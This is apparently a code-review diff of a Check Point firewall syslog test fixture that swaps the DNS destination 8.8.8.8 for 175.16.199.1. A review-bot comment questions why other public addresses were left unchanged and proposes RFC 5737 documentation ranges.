 <134>1 2020-03-29T19:35:48Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80f896,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46034"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T19:35:50Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f898,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T19:36:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f8c5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51194"; service:"443"; service_id:"https"; src:"192.168.1.117"]
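Review bot: The `8.8.8.8` → `175.16.199.1` substitution is applied only to the `service:"53"` / `service_id:"domain-udp"` lines (the two pairs at 19:35:34 and 19:35:44 here, and the 19:37:31, 19:37:41, 19:37:51 and 19:38:01 pairs in the `@@ -4433,16 +4433,16 @@` hunk), while other public destinations in the surrounding context lines — `162.159.200.123`, `104.99.234.45`, `162.159.200.1` here, `192.124.249.31` and `192.124.249.36` in the next hunk — are left untouched. If the intent is to keep real-world addresses out of this fixture, those should be rewritten in the same pass, and an RFC 5737 documentation range (`192.0.2.0/24`, `198.51.100.0/24`, `203.0.113.0/24`) is the conventional choice since `175.16.199.1` is an ordinary routable address; if instead it was chosen because the test GeoIP database resolves it, a one-line statement of that in the commit description would stop the next reader from "correcting" it. Any expected-events file generated from this log will need regenerating alongside it, as `destination.ip` and any enrichment derived from it now differ.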
@@ -4433,16 +4433,16 @@
 <134>1 2020-03-29T19:37:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f8dc,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33266"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10315"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T19:37:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f8dc,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57147"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T19:37:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f8dc,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40968"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10316"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T19:37:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f8fb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45655"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:37:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f8fb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510651"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32915"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:37:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f8fb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45655"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:37:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f8fb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510651"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32915"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:37:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f8fd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T19:37:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f905,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510661"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58581"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:37:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f905,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510661"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49213"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:37:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f905,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510661"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58581"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:37:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f905,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510661"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49213"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:37:50Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f90f,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
-<134>1 2020-03-29T19:37:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f90f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510671"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46049"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:37:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f90f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510671"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50500"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:38:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f919,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510681"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52110"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:38:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f919,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510681"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43120"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:37:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f90f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510671"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46049"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:37:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f90f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510671"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50500"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:38:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f919,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510681"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52110"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:38:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f919,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510681"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43120"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:38:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f93d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51196"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T19:38:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f93d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51197"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T19:38:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f93e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -4801,12 +4801,12 @@ <134>1 2020-03-29T20:09:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810079,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51464"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T20:09:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81007a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51465"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T20:09:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81007a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
